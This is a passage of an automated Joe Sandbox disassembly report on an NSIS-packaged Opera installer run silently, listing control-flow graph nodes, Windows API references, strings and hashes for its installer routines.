3315->3272 3317 40651e 3316->3317 3318 406522 3317->3318 3319 406527 RegOpenKeyExW 3317->3319 3318->3296 3318->3297 3319->3318 3321 406a48 wsprintfW LoadLibraryExW 3320->3321 3321->3302 3324 405fa4 3323->3324 3325 405fba 3324->3325 3326 405fab CharNextW 3324->3326 3325->3311 3326->3324 3928 406dc0 3930 406c44 3928->3930 3929 4075af 3930->3929 3931 406cc5 GlobalFree 3930->3931 3932 406cce GlobalAlloc 3930->3932 3933 406d45 GlobalAlloc 3930->3933 3934 406d3c GlobalFree 3930->3934 3931->3932 3932->3929 3932->3930 3933->3929 3933->3930 3934->3933 3935 402641 3936 402dcb 21 API calls 3935->3936 3937 402648 3936->3937 3940 406192 GetFileAttributesW CreateFileW 3937->3940 3939 402654 3940->3939 3941 4025c3 3942 402e0b 21 API calls 3941->3942 3943 4025cd 3942->3943 3951 402da9 3943->3951 3945 4025d6 3946 4025f2 RegEnumKeyW 3945->3946 3947 4025fe RegEnumValueW 3945->3947 3948 402953 3945->3948 3949 402613 RegCloseKey 3946->3949 3947->3949 3949->3948 3952 4066df 21 API calls 3951->3952 3953 402dbe 3952->3953 3953->3945 3954 4015c8 3955 402dcb 21 API calls 3954->3955 3956 4015cf SetFileAttributesW 3955->3956 3957 4015e1 3956->3957 3860 401fc9 3861 402dcb 21 API calls 3860->3861 3862 401fcf 3861->3862 3863 405727 28 API calls 3862->3863 3864 401fd9 3863->3864 3865 405c85 2 API calls 3864->3865 3866 401fdf 3865->3866 3867 402002 CloseHandle 3866->3867 3870 402953 3866->3870 3875 406b41 WaitForSingleObject 3866->3875 3867->3870 3871 401ff4 3872 402004 3871->3872 3873 401ff9 3871->3873 3872->3867 3880 4065e9 wsprintfW 3873->3880 3876 406b5b 3875->3876 3877 406b6d GetExitCodeProcess 3876->3877 3878 406ad2 2 API calls 3876->3878 3877->3871 3879 406b62 WaitForSingleObject 3878->3879 3879->3876 3880->3867 3965 404acb 3966 404b01 3965->3966 3967 404adb 3965->3967 3975 404688 3966->3975 3972 404621 3967->3972 3970 404ae8 SetDlgItemTextW 3970->3966 3973 4066df 21 API calls 3972->3973 3974 40462c SetDlgItemTextW 3973->3974 3974->3970 3976 4046a0 GetWindowLongW 3975->3976 3977 40474b 
3975->3977 3976->3977 3978 4046b5 3976->3978 3978->3977 3979 4046e2 GetSysColor 3978->3979 3980 4046e5 3978->3980 3979->3980 3981 4046f5 SetBkMode 3980->3981 3982 4046eb SetTextColor 3980->3982 3983 404713 3981->3983 3984 40470d GetSysColor 3981->3984 3982->3981 3985 404724 3983->3985 3986 40471a SetBkColor 3983->3986 3984->3983 3985->3977 3987 404737 DeleteObject 3985->3987 3988 40473e CreateBrushIndirect 3985->3988 3986->3985 3987->3988 3988->3977 3911 40254f 3922 402e0b 3911->3922 3914 402dcb 21 API calls 3915 402562 3914->3915 3916 40256d RegQueryValueExW 3915->3916 3918 402953 3915->3918 3917 40258d 3916->3917 3921 402593 RegCloseKey 3916->3921 3917->3921 3927 4065e9 wsprintfW 3917->3927 3921->3918 3923 402dcb 21 API calls 3922->3923 3924 402e22 3923->3924 3925 40650f RegOpenKeyExW 3924->3925 3926 402559 3925->3926 3926->3914 3927->3921 3992 40204f 3993 402dcb 21 API calls 3992->3993 3994 402056 3993->3994 3995 406a96 5 API calls 3994->3995 3996 402065 3995->3996 3997 402081 GlobalAlloc 3996->3997 3999 4020f1 3996->3999 3998 402095 3997->3998 3997->3999 4000 406a96 5 API calls 3998->4000 4001 40209c 4000->4001 4002 406a96 5 API calls 4001->4002 4003 4020a6 4002->4003 4003->3999 4007 4065e9 wsprintfW 4003->4007 4005 4020df 4008 4065e9 wsprintfW 4005->4008 4007->4005 4008->3999 4009 4021cf 4010 402dcb 21 API calls 4009->4010 4011 4021d6 4010->4011 4012 402dcb 21 API calls 4011->4012 4013 4021e0 4012->4013 4014 402dcb 21 API calls 4013->4014 4015 4021ea 4014->4015 4016 402dcb 21 API calls 4015->4016 4017 4021f4 4016->4017 4018 402dcb 21 API calls 4017->4018 4019 4021fe 4018->4019 4020 40223d CoCreateInstance 4019->4020 4021 402dcb 21 API calls 4019->4021 4024 40225c 4020->4024 4021->4020 4022 401423 28 API calls 4023 40231b 4022->4023 4024->4022 4024->4023 4025 401a55 4026 402dcb 21 API calls 4025->4026 4027 401a5e ExpandEnvironmentStringsW 4026->4027 4028 401a72 4027->4028 4030 401a85 4027->4030 4029 401a77 lstrcmpW 4028->4029 4028->4030 4029->4030 4031 404757 
lstrcpynW lstrlenW 4032 4014d7 4033 402da9 21 API calls 4032->4033 4034 4014dd Sleep 4033->4034 4036 402c4f 4034->4036 4042 4023d7 4043 4023e5 4042->4043 4044 4023df 4042->4044 4046 4023f3 4043->4046 4047 402dcb 21 API calls 4043->4047 4045 402dcb 21 API calls 4044->4045 4045->4043 4048 402dcb 21 API calls 4046->4048 4050 402401 4046->4050 4047->4046 4048->4050 4049 402dcb 21 API calls 4051 40240a WritePrivateProfileStringW 4049->4051 4050->4049 4052 402459 4053 402461 4052->4053 4054 40248c 4052->4054 4056 402e0b 21 API calls 4053->4056 4055 402dcb 21 API calls 4054->4055 4057 402493 4055->4057 4058 402468 4056->4058 4063 402e89 4057->4063 4060 4024a0 4058->4060 4061 402dcb 21 API calls 4058->4061 4062 402479 RegDeleteValueW RegCloseKey 4061->4062 4062->4060 4064 402e9d 4063->4064 4065 402e96 4063->4065 4064->4065 4067 402ece 4064->4067 4065->4060 4068 40650f RegOpenKeyExW 4067->4068 4069 402efc 4068->4069 4070 402f0c RegEnumValueW 4069->4070 4077 402f2f 4069->4077 4078 402fa6 4069->4078 4071 402f96 RegCloseKey 4070->4071 4070->4077 4071->4078 4072 402f6b RegEnumKeyW 4073 402f74 RegCloseKey 4072->4073 4072->4077 4074 406a96 5 API calls 4073->4074 4076 402f84 4074->4076 4075 402ece 6 API calls 4075->4077 4076->4078 4079 402f88 RegDeleteKeyW 4076->4079 4077->4071 4077->4072 4077->4073 4077->4075 4078->4065 4079->4078 4080 40175a 4081 402dcb 21 API calls 4080->4081 4082 401761 SearchPathW 4081->4082 4083 40177c 4082->4083 4084 401d5d 4085 402da9 21 API calls 4084->4085 4086 401d64 4085->4086 4087 402da9 21 API calls 4086->4087 4088 401d70 GetDlgItem 4087->4088 4089 40265d 4088->4089 4097 4047e0 4099 404912 4097->4099 4101 4047f8 4097->4101 4098 40497c 4100 404a46 4098->4100 4102 404986 GetDlgItem 4098->4102 4099->4098 4099->4100 4106 40494d GetDlgItem SendMessageW 4099->4106 4108 404688 8 API calls 4100->4108 4103 404621 22 API calls 4101->4103 4104 4049a0 4102->4104 4105 404a07 4102->4105 4107 40485f 4103->4107 4104->4105 4113 4049c6 SendMessageW LoadCursorW 
SetCursor 4104->4113 4105->4100 4109 404a19 4105->4109 4130 404643 EnableWindow 4106->4130 4111 404621 22 API calls 4107->4111 4112 404a41 4108->4112 4114 404a2f 4109->4114 4115 404a1f SendMessageW 4109->4115 4117 40486c CheckDlgButton 4111->4117 4134 404a8f 4113->4134 4114->4112 4119 404a35 SendMessageW 4114->4119 4115->4114 4116 404977 4131 404a6b 4116->4131 4128 404643 EnableWindow 4117->4128 4119->4112 4123 40488a GetDlgItem 4129 404656 SendMessageW 4123->4129 4125 4048a0 SendMessageW 4126 4048c6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4125->4126 4127 4048bd GetSysColor 4125->4127 4126->4112 4127->4126 4128->4123 4129->4125 4130->4116 4132 404a79 4131->4132 4133 404a7e SendMessageW 4131->4133 4132->4133 4133->4098 4137 405cc8 ShellExecuteExW 4134->4137 4136 4049f5 LoadCursorW SetCursor 4136->4105 4137->4136 4138 402663 4139 402692 4138->4139 4140 402677 4138->4140 4142 4026c2 4139->4142 4143 402697 4139->4143 4141 402da9 21 API calls 4140->4141 4153 40267e 4141->4153 4145 402dcb 21 API calls 4142->4145 4144 402dcb 21 API calls 4143->4144 4146 40269e 4144->4146 4147 4026c9 lstrlenW 4145->4147 4155 4066c4 WideCharToMultiByte 4146->4155 4147->4153 4149 4026b2 lstrlenA 4149->4153 4150 40270c 4151 4026f6 4151->4150 4152 406244 WriteFile 4151->4152 4152->4150 4153->4150 4153->4151 4156 406273 SetFilePointer 4153->4156 4155->4149 4157 40628f 4156->4157 4164 4062a7 4156->4164 4158 406215 ReadFile 4157->4158 4159 40629b 4158->4159 4160 4062b0 SetFilePointer 4159->4160 4161 4062d8 SetFilePointer 4159->4161 4159->4164 4160->4161 4162 4062bb 4160->4162 4161->4164 4163 406244 WriteFile 4162->4163 4163->4164 4164->4151 3591 403665 SetErrorMode GetVersionExW 3592 4036f1 3591->3592 3593 4036b9 GetVersionExW 3591->3593 3594 403748 3592->3594 3595 406a96 5 API calls 3592->3595 3593->3592 3596 406a26 3 API calls 3594->3596 3595->3594 3597 40375e lstrlenA 3596->3597 3597->3594 3598 40376e 3597->3598 3599 406a96 5 API calls 3598->3599 3600 403775 3599->3600 
3601 406a96 5 API calls 3600->3601 3602 40377c 3601->3602 3603 406a96 5 API calls 3602->3603 3604 403788 #17 OleInitialize SHGetFileInfoW 3603->3604 3679 4066a2 lstrcpynW 3604->3679 3607 4037d7 GetCommandLineW 3680 4066a2 lstrcpynW 3607->3680 3609 4037e9 3610 405f9e CharNextW 3609->3610 3611 40380f CharNextW 3610->3611 3621 403821 3611->3621 3612 403923 3613 403937 GetTempPathW 3612->3613 3681 403634 3613->3681 3615 40394f 3616 403953 GetWindowsDirectoryW lstrcatW 3615->3616 3617 4039a9 DeleteFileW 3615->3617 3619 403634 12 API calls 3616->3619 3691 4030f5 GetTickCount GetModuleFileNameW 3617->3691 3618 405f9e CharNextW 3618->3621 3622 40396f 3619->3622 3621->3612 3621->3618 3625 403925 3621->3625 3622->3617 3624 403973 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3622->3624 3623 4039bd 3626 403bb0 ExitProcess CoUninitialize 3623->3626 3633 405f9e CharNextW 3623->3633 3662 403a64 3623->3662 3627 403634 12 API calls 3624->3627 3778 4066a2 lstrcpynW 3625->3778 3628 403bc2 3626->3628 3629 403be6 3626->3629 3631 4039a1 3627->3631 3632 405d02 MessageBoxIndirectW 3628->3632 3634 403c6a ExitProcess 3629->3634 3635 403bee GetCurrentProcess OpenProcessToken 3629->3635 3631->3617 3631->3626 3638 403bd0 ExitProcess 3632->3638 3643 4039dc 3633->3643 3639 403c06 LookupPrivilegeValueW AdjustTokenPrivileges 3635->3639 3640 403c3a 3635->3640 3639->3640 3642 406a96 5 API calls 3640->3642 3653 403c41 3642->3653 3644 403a3a 3643->3644 3645 403a7d 3643->3645 3648 406079 18 API calls 3644->3648 3781 405c6d 3645->3781 3647 403c56 ExitWindowsEx 3647->3634 3650 403c63 3647->3650 3651 403a46 3648->3651 3795 40140b 3650->3795 3651->3626 3779 4066a2 lstrcpynW 3651->3779 3653->3647 3653->3650 3655 403a9c 3657 403ab4 3655->3657 3785 4066a2 lstrcpynW 3655->3785 3661 403ada wsprintfW 3657->3661 3676 403b06 3657->3676 3658 403a59 3780 4066a2 lstrcpynW 3658->3780 3663 4066df 21 API calls 3661->3663 3721 403d74 3662->3721 3663->3657 3666 403b50 SetCurrentDirectoryW 3669 

Control-flow Graph
APIs
• SetErrorMode.KERNEL32 ref: 00403688
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
• lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
• #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
• OleInitialize.OLE32(00000000), ref: 004037A3
• SHGetFileInfoW.SHELL32(00432708,00000000,?,000002B4,00000000), ref: 004037C2
• GetCommandLineW.KERNEL32(00464260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
• CharNextW.USER32(00000000,004BD000,00000020,004BD000,00000000,?,00000008,0000000A,0000000C), ref: 00403810
• GetTempPathW.KERNEL32(00002000,004D1000,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
• GetWindowsDirectoryW.KERNEL32(004D1000,00001FFB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
• lstrcatW.KERNEL32(004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
• GetTempPathW.KERNEL32(00001FFC,004D1000,004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
• lstrcatW.KERNEL32(004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
• SetEnvironmentVariableW.KERNEL32(TEMP,004D1000,004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
• SetEnvironmentVariableW.KERNEL32(TMP,004D1000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
• DeleteFileW.KERNEL32(004CD000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
• lstrlenW.KERNEL32(004D1000,004BD000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
  • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
• wsprintfW.USER32 ref: 00403AE4
• GetFileAttributesW.KERNEL32(00481000,004D1000), ref: 00403B17
• DeleteFileW.KERNEL32(00481000), ref: 00403B23
• SetCurrentDirectoryW.KERNEL32(004D1000,004D1000), ref: 00403B51
  • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
• CopyFileW.KERNEL32(004D9000,00481000,00000001,004D1000,00000000), ref: 00403B67
  • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
  • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
  • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(76F93420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 00406A0A
  • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
• ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB0
• CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
• ExitProcess.KERNEL32 ref: 00403BD2
• CloseHandle.KERNEL32(00000000,00485000,00485000,?,00481000,00000000), ref: 00403BD9
• GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
• ExitProcess.KERNEL32 ref: 00403C7C
  • Part of subcall function 00405C50: CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
Strings
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
• String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
• API String ID: 2017177436-2502969717
• Opcode ID: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
• Instruction ID: d5dd5e0f9c74a08960ebc8aa75e9a138e3a42fd8f19371cc0c5244fd25c86c9d
• Opcode Fuzzy Hash: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
• Instruction Fuzzy Hash: 56F108316043019AD720AF769D45B2B7AE8EF4174AF10883EF581B22D1DB7CDA45CB6E

Control-flow Graph

APIs
• DeleteFileW.KERNEL32(?,?,76F93420,76F92EE0,004BD000), ref: 00405DD7
• lstrcatW.KERNEL32(00452750,\*.*,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E1F
• lstrcatW.KERNEL32(?,0040A014,?,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E42
• lstrlenW.KERNEL32(?,?,0040A014,?,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E48
• FindFirstFileW.KERNEL32(00452750,?,?,?,0040A014,?,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E58
• FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
• FindClose.KERNEL32(00000000), ref: 00405F07
Strings
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: P'E$\*.*
• API String ID: 2035342205-897026672
• Opcode ID: 2a22b74e29257ee4312f2694a2476e0e063d7e13d36b91b3edff1e0c18e84ae8
• Instruction ID: d3f7042800757c758c726763e218659af4e34a2018f279a2393577cf1f32b1c8
• Opcode Fuzzy Hash: 2a22b74e29257ee4312f2694a2476e0e063d7e13d36b91b3edff1e0c18e84ae8
• Instruction Fuzzy Hash: 5741D130800A05E6CB21AB61CD89ABF7678EF45755F14413FF881B11D1DB7C8A82DEAE

Control-flow Graph

Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
• Instruction ID: 2c84522690a72e7b125efbdd79dcce5a6d58b8fc95eff680b6a5e34cc787ad25
• Opcode Fuzzy Hash: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
• Instruction Fuzzy Hash: 5EF17670D04229CBDF28CFA8C8946ADBBB1FF44305F24856ED456BB281D7786A86CF45
APIs
• FindFirstFileW.KERNEL32(76F93420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 00406A0A
• FindClose.KERNEL32(00000000), ref: 00406A16
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                              • Opcode ID: c678162996fe6daf9e8ab4f1fec6b2103351496eed0ed7f1d1f24d988285780e
                                                                                                                                              • Instruction ID: 35f0ff7019ed0dad564a4e6eb4f1dd92456e0906ec704515d4596d21edce6ab9
                                                                                                                                              • Opcode Fuzzy Hash: c678162996fe6daf9e8ab4f1fec6b2103351496eed0ed7f1d1f24d988285780e
                                                                                                                                              • Instruction Fuzzy Hash: EDD012317551205BC241A73C6D0C89B7E589F1A3317118B37F46BF21E4D7348C628A9D

Control-flow Graph (function starting at 403d74; executed/not-executed graph rendering omitted)
APIs
  • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
  • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
• lstrcatW.KERNEL32(004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,76F93420,004D1000,00000000,004BD000,00008001), ref: 00403DF5
• lstrlenW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,76F93420), ref: 00403E75
• lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000), ref: 00403E88
• GetFileAttributesW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0), ref: 00403E93
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C1000), ref: 00403EDC
  • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
• RegisterClassW.USER32(00464200), ref: 00403F19
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
• ShowWindow.USER32(00000005,00000000), ref: 00403F9C
• GetClassInfoW.USER32(00000000,RichEdit20W,00464200), ref: 00403FC8
• GetClassInfoW.USER32(00000000,RichEdit,00464200), ref: 00403FD5
• RegisterClassW.USER32(00464200), ref: 00403FDE
• DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$H'D$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 1975747703-406167329
• Opcode ID: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
• Instruction ID: 15514f3cea8a7976e0aa4835bc9f56462f0e59a4e5397df6ef3051f83c2bc2bc
• Opcode Fuzzy Hash: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
• Instruction Fuzzy Hash: 3C61E770640301BED720AF669D95F273AACEB85B49F10457FF941B22E2DB7D58018A2E

Control-flow Graph (function starting at 4030f5; executed/not-executed graph rendering omitted)
APIs
• GetTickCount.KERNEL32 ref: 00403109
• GetModuleFileNameW.KERNEL32(00000000,004D9000,00002000), ref: 00403125
  • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
  • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
• GetFileSize.KERNEL32(00000000,00000000,004DD000,00000000,004C9000,004C9000,004D9000,004D9000,80000000,00000003), ref: 0040316E
• GlobalAlloc.KERNEL32(00000040,00008001), ref: 004032B0
Strings
• Error launching installer, xrefs: 00403145
• Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032F9
• Null, xrefs: 004031EC
• soft, xrefs: 004031E3
• hA, xrefs: 004032B6
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403347
• Inst, xrefs: 004031DA
Similarity
• API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
• String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$hA$soft
• API String ID: 2803837635-3376623841
• Opcode ID: a78e4ad808f85481dcd79512046ee08fb7c97768d62f5dc4e9826f195081d52b
• Instruction ID: ad1f7a9ef70f4aee06910e8501363caf5be3f78a24e024e3506d72c770e38dd5
• Opcode Fuzzy Hash: a78e4ad808f85481dcd79512046ee08fb7c97768d62f5dc4e9826f195081d52b
• Instruction Fuzzy Hash: 0271A071D00204ABDB209FA4DD85B6E7AACEB05716F10417FE911B72D1DB789F408B6D

Control-flow Graph (function starting at 401794; executed/not-executed graph rendering omitted)
APIs
• lstrcatW.KERNEL32(00000000,00000000,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,004C5000,?,?,00000031), ref: 004017D5
• CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,00000000,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,004C5000,?,?,00000031), ref: 004017FA
  • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
  • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
  • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
  • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
  • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
  • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
• API String ID: 1941528284-1546330588
• Opcode ID: abfc48dbde18ea0f61bdba3ff75caee9a5c96404e809a9cb74966422e51516d8
• Instruction ID: 9f42f1e7eaebfaebc1b2313fce90f35831c5a59d22c64b0766d7391dfec550b2
• Opcode Fuzzy Hash: abfc48dbde18ea0f61bdba3ff75caee9a5c96404e809a9cb74966422e51516d8
